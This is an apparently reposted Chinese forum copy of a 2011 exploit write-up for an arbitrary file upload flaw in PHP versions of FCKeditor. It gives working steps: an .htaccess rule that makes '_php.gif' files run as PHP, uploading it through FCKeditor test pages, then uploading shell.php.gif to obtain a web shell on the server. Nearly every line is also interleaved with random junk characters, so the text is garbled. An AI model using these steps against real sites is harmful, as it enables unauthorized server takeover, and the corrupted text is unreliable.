FCKeditor所有php版本Upload上传漏洞! g+ I& S Y0 }; _
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
0 A' V. n0 l4 ^3 A" U0 W4 m) e减小字体 增大字体! z' U% J: t+ [, A2 m2 ?/ m2 m6 q
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
; r( W* ?+ R& F[+] Date: 2011
6 r( N: ]0 ?$ B, o2 G6 Y[+] Author : sinesafe.cn
% ?" S+ k3 i5 w+ m* y" a. w& o[+] Website : WwW.sinesafe.cn U& Z4 }: z1 X" j; N
———————————————————4 P9 S1 h4 ^' z) e( J, }0 h% U6 W
1.create a htaccess file:
* Q. G7 C: N. _/ }3 o3 b; _1 Wcode:
8 P$ T% S1 R3 J2 {; c<FilesMatch “_php.gif”>
/ ~$ B( X& I$ Z2 A7 r8 k# _SetHandler application/x-httpd-php8 E# P% @) w$ S, J. s3 Z
</FilesMatch>
, t- H: F9 H/ I: Z2 e' `. \5 P
0 V) y& G @: `- A( b) m" z! C2.Now upload this htaccess with FCKeditor./ b/ D0 }( F5 j4 \
* T" X; H, K" ?, G) f% r( S3 ehttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html. Z2 d/ {2 ^. w$ l' }
' X+ n# D! S. p! m# k" Zhttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html
# O' U! N; \5 o4 S% t. e% q! n# s7 N) @0 S1 O, S& E
———————————————————————————————-+ d8 j: |: Q6 S# |2 c
3.Now upload shell.php.gif with FCKeditor. g1 \5 O7 @* n' @ n
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.# G. g# F( U& K' D1 C
5.http://www.sinesafe.cn/anything/shell_php.gif
8 ^( N( n1 {3 z8 N6.Now shell is available from server. |
9 C0 Y# b- q0 l0 _7 _2 e
+ o3 Q7 k6 X1 V9 g/ D
& {1 F1 X. X% n |
发表于 2013-10-27 17:25:21
收藏
支持
反对